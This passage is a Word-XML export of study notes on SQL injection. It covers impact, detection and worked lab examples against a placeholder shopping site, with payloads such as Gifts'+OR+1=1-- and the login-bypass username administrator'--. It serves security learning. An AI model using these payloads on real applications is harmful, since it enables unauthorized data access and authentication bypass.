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F9634" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD2031C" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t>SQL Injection is a web security appl vul that allows attacker to interfere with queries into application that make the connection with database. An attacker view the data, those data can’t retrieve by normally. The data might include other user data, other data that app access. There might be chances is there attacker can modify or delete those data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CE282F" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t>Some cases SQL injection attack get hacked with backend then DOS attack (Denial of service) is possible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E852D7" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBECBB0" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What is the impact of a successful SQL injection attack?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3198E0A7" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">A successful SQL injection attack can result in unauthorized access to sensitive data, such as: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EF259B" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">Passwords. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01829B55" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">Credit card details. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8DAE33" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">Personal user information. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78609558" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">SQL injection is used in many high-profile data breaches that causes the reputation damage &amp; regulatory fines. In some cases, an attacker can obtain a persistent backdoor into an organization's systems, leading to a long-term compromise that can go unnoticed for an extended period. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4E4CDD" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E78E21" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How to detect SQL injection vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18446BA5" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t>You can detect SQL injection manually using a systematic set of tests against every entry point in the application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E262C0" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF31000" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003B036A">
        <w:t>' single quote character look for error (an error occurs then there is chance of SQLi)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB9CF4D" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">Boolean conditions such as OR 1=1 and OR 1=2, and look for differences in the application's responses. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C52AE30" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">Some SQL-specific syntax that evaluates to the base (original) value of the entry point, and to a different value, and look for systematic differences in the application responses. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF152F5" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">Payloads designed to trigger time delays when executed within a SQL query, and look for differences in the time taken to respond. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470873F2" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">OAST payloads designed to trigger an out-of-band network interaction when executed within a SQL query, and monitor any resulting interactions. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A54D6F8" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C7A996" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC18986" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t>Means</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C5D610" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003B036A">
        <w:t>' look for error (Generally 500 internal server error)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B1EB5F" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003B036A">
        <w:t>Vanilla injection attack, Boolean condition as 1=1 OR 1=2 and look for app Response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589F60E5" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003B036A">
        <w:t>Apply the SQL syntax to entry point &amp; look for responses in app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755512AC" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003B036A">
        <w:t>Apply the Payload designed to trigger time delays &amp; look app time respond</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBA3663" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">OAST payloads designed to trigger an out-of-band network interaction when executed within a SQL query, and monitor any resulting interactions. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C54F02" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5974A770" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4857DD" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQL injection examples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515FB3DE" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">There are lots of SQL injection vulnerabilities, attacks, and techniques, that occur in different situations. Some common SQL injection examples include: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F842BC8" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId5" w:anchor="retrieving-hidden-data" w:history="1">
        <w:r w:rsidRPr="003B036A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Retrieving hidden data</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003B036A">
        <w:t>, where you can modify a SQL query to return additional results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C907337" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:anchor="subverting-application-logic" w:history="1">
        <w:r w:rsidRPr="003B036A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Subverting application logic</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003B036A">
        <w:t>, where you can change a query to interfere with the application's logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA103D5" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="003B036A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>UNION attacks</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003B036A">
        <w:t>, where you can retrieve data from different database tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481CF026" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="003B036A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Blind SQL injection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003B036A">
        <w:t>, where the results of a query you control are not returned in the application's responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1935BFB1" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Retrieving hidden data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E07B3A1" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">Imagine a shopping application that displays products in different categories. When the user clicks on the </w:t>
      </w:r>
      <w:r w:rsidRPr="003B036A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Gifts</w:t>
      </w:r>
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve"> category, their browser requests the URL: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48830885" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="003B036A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://insecure-website.com/products?category=Gifts</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="65EAB8C5" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">This causes the application to make a SQL query to retrieve details of the relevant products from the database: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BF5154" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t>SELECT * FROM products WHERE category = 'Gifts' AND released = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9FF5B4" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">This SQL query asks the database to return: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A1F3B3" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">all details (*) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150EF6CB" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">from the products table </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1E7846" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">where the category is Gifts </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF90DE9" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">and released is 1. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5697A6D8" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">The restriction released = 1 is being used to hide products that are not released. We could assume for unreleased products, released = 0. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E88869" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">The application doesn't implement any defenses against SQL injection attacks. This means an attacker can construct the following attack, for example: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC5D2BF" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="003B036A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://insecure-website.com/products?category=Gifts'</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003B036A">
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2932E8D7" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">This results in the SQL query: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211B58E6" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t>SELECT * FROM products WHERE category = 'Gifts'--' AND released = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312E2C66" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">Crucially, note that -- is a comment indicator in SQL. This means that the rest of the query is interpreted as a comment, effectively removing it. In this example, this means the query no longer includes AND released = 1. As a result, all products are displayed, including those that are not yet released. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536A0B69" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">You can use a similar attack to cause the application to display all the products in any category, including categories that they don't know about: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2644AA7D" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="003B036A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://insecure-website.com/products?category=Gifts'+OR+1=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003B036A">
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334D541A" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">This results in the SQL query: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A0495B" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t>SELECT * FROM products WHERE category = 'Gifts' OR 1=1--' AND released = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782AEEB6" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">The modified query returns all items where either the category is Gifts, or 1 is equal to 1. As 1=1 is always true, the query returns all items. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2214C756" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122FF49A" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">Lab-01 : </w:t>
      </w:r>
      <w:r w:rsidRPr="003B036A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Retrieving hidden data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C780ED" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t>SQL Injection - product cateogory filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A9DACB" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t>Select * from products wher category = 'Gifts' and released =1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033B574C" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">End Goal : Display all products both released and unreleased </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16909EE8" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452CE8C6" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t>Analysis:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EAD123" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59662A6B" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t>Put ' if we are getting the error means we are  sql injection is possible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F762AA1" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:lastRenderedPageBreak/>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334E4193" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t>Select * from products where category ='Pets' and released =1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C366B22" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t>Select * from products where category ='' and released =1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB8E32D" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t>Select * from products where category ='--'' and released =1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EFF770" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t>Select * from products where category =''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F43F1B" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t>Select * from products where category ='' or 1=1 --'  and released =1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7225CA38" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECBB743" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584254FD" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Subverting application logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C34AFA" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">Imagine an application that lets users log in with a username and password. If a user submits the username wiener and the password bluecheese, the application checks the credentials by performing the following SQL query: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761FFCDC" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t>SELECT * FROM users WHERE username = 'wiener' AND password = 'bluecheese'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44346BEC" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">If the query returns the details of a user, then the login is successful. Otherwise, it is rejected. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1D1B12" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">In this case, an attacker can log in as any user without the need for a password. They can do this using the SQL comment sequence -- to remove the password check from the WHERE clause of the query. For example, submitting the username administrator'-- and a blank password results in the following query: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A44F51" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t>SELECT * FROM users WHERE username = 'administrator'--' AND password = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F839EBB" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">This query returns the user whose username is administrator and successfully logs the attacker in as that user. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276D50A4" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
